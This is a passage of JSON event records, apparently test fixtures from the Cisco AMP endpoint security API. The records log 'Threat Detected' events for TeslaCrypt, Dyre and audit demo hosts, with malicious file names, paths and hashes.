Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261637","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":665000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261636","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":509000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261635","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259028591575000,"timestamp":1610705845,"timestamp_nanoseconds":984000000,"date":"2021-01-15T10:17:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259028591575130","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251439135752000,"timestamp":1610705841,"timestamp_nanoseconds":455000000,"date":"2021-01-15T10:17:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251439135752194","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258981346935000,"timestamp":1610705834,"timestamp_nanoseconds":346000000,"date":"2021-01-15T10:17:14+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258981346934873","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258929807327000,"timestamp":1610705822,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:02+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258929807327320","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668623368585000,"timestamp":1610705816,"timestamp_nanoseconds":753000000,"date":"2021-01-15T10:16:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668623368585250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668623368585000,"timestamp":1610705816,"timestamp_nanoseconds":733000000,"date":"2021-01-15T10:16:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668623368585249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668623368585000,"timestamp":1610705816,"timestamp_nanoseconds":324000000,"date":"2021-01-15T10:16:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668623368585248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258878267720000,"timestamp":1610705810,"timestamp_nanoseconds":322000000,"date":"2021-01-15T10:16:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258878267719767","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258826728112000,"timestamp":1610705798,"timestamp_nanoseconds":310000000,"date":"2021-01-15T10:16:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258826728112214","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251202912551000,"timestamp":1610705786,"timestamp_nanoseconds":262000000,"date":"2021-01-15T10:16:26+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251202912550913","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\Windows\\System32\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258706469028000,"timestamp":1610705770,"timestamp_nanoseconds":292000000,"date":"2021-01-15T10:16:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258706469027925","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258680699224000,"timestamp":1610705764,"timestamp_nanoseconds":286000000,"date":"2021-01-15T10:16:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258680699224148","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668365670547000,"timestamp":1610705756,"timestamp_nanoseconds":428000000,"date":"2021-01-15T10:15:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668365670547487","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668365670547000,"timestamp":1610705756,"timestamp_nanoseconds":39000000,"date":"2021-01-15T10:15:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668365670547486","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668365670547000,"timestamp":1610705756,"timestamp_nanoseconds":9000000,"date":"2021-01-15T10:15:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668361375580189","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668361375580000,"timestamp":1610705755,"timestamp_nanoseconds":616000000,"date":"2021-01-15T10:15:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668361375580188","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258629159617000,"timestamp":1610705752,"timestamp_nanoseconds":649000000,"date":"2021-01-15T10:15:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258629159616595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258577620009000,"timestamp":1610705740,"timestamp_nanoseconds":637000000,"date":"2021-01-15T10:15:40+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258577620009042","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258526080401000,"timestamp":1610705728,"timestamp_nanoseconds":609000000,"date":"2021-01-15T10:15:28+00:00","event_type":"Threat 